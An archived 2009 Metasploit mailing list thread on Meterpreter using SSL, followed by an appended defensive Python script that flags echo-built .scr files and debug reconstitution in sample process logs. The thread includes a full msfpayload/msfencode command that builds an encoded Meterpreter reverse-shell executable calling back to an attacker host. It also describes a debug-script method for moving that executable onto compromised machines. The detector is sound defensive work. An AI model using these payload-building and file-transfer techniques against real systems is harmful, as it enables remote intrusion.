
Metasploit mailing list archives
Meterpreter + SSL
From: wfdawson at bellsouth.net (Willard Dawson)
Date: Mon, 6 Jul 2009 23:09:35 -0400
That's cool. I wonder, though... Today, for the first time in a week or more, I used msfencode and shikata_ga_nai to make another instance of an .exe:

./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe

The resulting binary file was quite a bit larger than previously. In the past, I have used makescr.pl from sqlninja to create an .scr file that can be used with Windows debug to reconstitute the rv_443.exe or whatever file. There are times when I have managed to obtain a remote shell, but for whatever reason found it difficult if not impossible to upload to or download onto the remote system. When one only has a remote command shell (of sorts), it's quite feasible to echo each line of a small .scr file to concatenate into a remote .scr file and then use debug to rebuild the original .exe. That is, it's feasible when the .scr file is only 112 lines, as was the case until recently. Now, my work results in a 600+ line file. I certainly won't be manipulating that sort of file manually! I suppose now I'll have to get happy with scripting in my own little world... Or, is there a way to tell msfencode to not use SSL or whatever it is that's made it blow up the resulting .exe?

-----Original Message-----
From: framework-bounces at spool.metasploit.com [mailto:framework-bounces at spool.metasploit.com] On Behalf Of HD Moore
Sent: Friday, June 26, 2009 7:24 PM
To: framework at spool.metasploit.com
Subject: [framework] Meterpreter + SSL

The meterpreter payload in the SVN trunk (3.3-dev) now uses SSL by default. Any staging activities (including the upload of metsrv.dll) will still be in cleartext, but all meterpreter communications are now protected by SSL automatically. This SSL mode does NO verification, so it's still possible for someone to MITM the session, but this buys some privacy-by-default.

-HD
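From the defender's side of this thread, as an added example that is not part of the original messages and not code from the Metasploit or sqlninja projects: the "echo each line into a remote .scr, then run debug to rebuild the .exe" procedure Willard describes leaves a distinctive process-creation trail, and a 600+ line script leaves a much louder one than a 112 line script. The Python below scans constructed, hypothetical process-creation log lines (the `host= pid= parent= cmdline=` layout, the field names, the `echo_threshold` default and the sample values are all assumptions for this example, not any real product's schema) and flags two things: a burst of `echo ... >> <file>.scr` appends to the same file on one host, and `debug` or `debug.exe` run with its standard input redirected from a script file. When both are seen on the same host for the same file, the debug finding is escalated.

```python
import re
from collections import defaultdict
from typing import List, NamedTuple, Optional


class Finding(NamedTuple):
    host: str
    rule: str
    file: str
    severity: str
    detail: int  # echo count for assembly findings, pid for debug findings


# Constructed, hypothetical process-creation events (assumed layout, not a real log schema).
SAMPLE_EVENTS = [
    "host=WS01 pid=4101 parent=cmd.exe cmdline=cmd.exe /c echo n rv_443.exe>>rv_443.scr",
    "host=WS01 pid=4102 parent=cmd.exe cmdline=cmd.exe /c echo e 0100 4d 5a 90 00>>rv_443.scr",
    "host=WS01 pid=4103 parent=cmd.exe cmdline=cmd.exe /c echo e 0104 03 00 00 00>>rv_443.scr",
    "host=WS01 pid=4104 parent=cmd.exe cmdline=cmd.exe /c echo rcx>>rv_443.scr",
    "host=WS01 pid=4105 parent=cmd.exe cmdline=cmd.exe /c echo w>>rv_443.scr",
    "host=WS01 pid=4106 parent=cmd.exe cmdline=cmd.exe /c echo q>>rv_443.scr",
    "host=WS01 pid=4107 parent=cmd.exe cmdline=debug < rv_443.scr",
    "host=WS02 pid=880 parent=explorer.exe cmdline=notepad.exe C:\\Users\\bob\\notes.txt",
    "host=WS02 pid=881 parent=cmd.exe cmdline=cmd.exe /c echo hello>>greeting.txt",
    "host=WS03 pid=1200 parent=cmd.exe cmdline=debug.exe < C:\\temp\\fix.scr",
    "this line is not an event and is skipped",
]

# One event per line: host, pid, parent image, then the rest of the line is the command line.
EVENT_RE = re.compile(r"host=(?P<host>\S+) pid=(?P<pid>\d+) parent=(?P<parent>\S+) cmdline=(?P<cmdline>.*)")
# "echo <anything> >> <file>.scr": the append redirect targets a debug script file.
ECHO_APPEND_RE = re.compile(r"\becho\b.*?>>\s*\"?(?P<target>[^\s\"&|]+\.scr)\"?", re.IGNORECASE)
# "debug < <script>" or "debug.exe < <script>": the legacy debugger fed a script on stdin.
DEBUG_STDIN_RE = re.compile(r"(?:^|[\\\s\"])debug(?:\.exe)?\"?\s*<\s*\"?(?P<script>[^\s\"&|]+)", re.IGNORECASE)


def parse_event(line: str) -> Optional[dict]:
    """Split one log line into its fields; returns None for lines that do not fit the layout."""
    m = EVENT_RE.match(line)
    if m is None:
        return None
    fields = m.groupdict()
    fields["pid"] = int(fields["pid"])
    return fields


def analyse(lines: List[str], echo_threshold: int = 5) -> List[Finding]:
    """Return findings for scripted .scr assembly and debug-from-script execution."""
    echo_counts = defaultdict(int)  # (host, target file) -> number of echo appends seen
    debug_runs = []                 # (host, pid, script file) in the order they occurred
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        m = ECHO_APPEND_RE.search(ev["cmdline"])
        if m:
            echo_counts[(ev["host"], m.group("target").lower())] += 1
        m = DEBUG_STDIN_RE.search(ev["cmdline"])
        if m:
            debug_runs.append((ev["host"], ev["pid"], m.group("script").lower()))

    # A handful of echoes is normal shell use; a burst into one .scr file is the assembly pattern.
    assembled = {key for key, n in echo_counts.items() if n >= echo_threshold}
    findings = [Finding(host, "scripted_scr_assembly", target, "medium", echo_counts[(host, target)])
                for host, target in sorted(assembled)]
    # debug reading a script is suspicious on its own; reading a script that was just
    # assembled line by line on the same host is the full reconstitution pattern.
    for host, pid, script in debug_runs:
        severity = "high" if (host, script) in assembled else "medium"
        findings.append(Finding(host, "debug_script_stdin", script, severity, pid))
    return findings


if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"{f.severity:6} {f.host} {f.rule} file={f.file} detail={f.detail}")
```

The threshold is deliberately a parameter: on a host where administrators routinely script debug, raise it or add the user to an allow-list rather than silencing the rule, since the debug-from-script finding alone still deserves a look.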
Current thread:
- Meterpreter + SSL Willard Dawson (Jul 06)
- Meterpreter + SSL HD Moore (Jul 06)
- <Possible follow-ups>
- Meterpreter + SSL Dusk (Aug 22)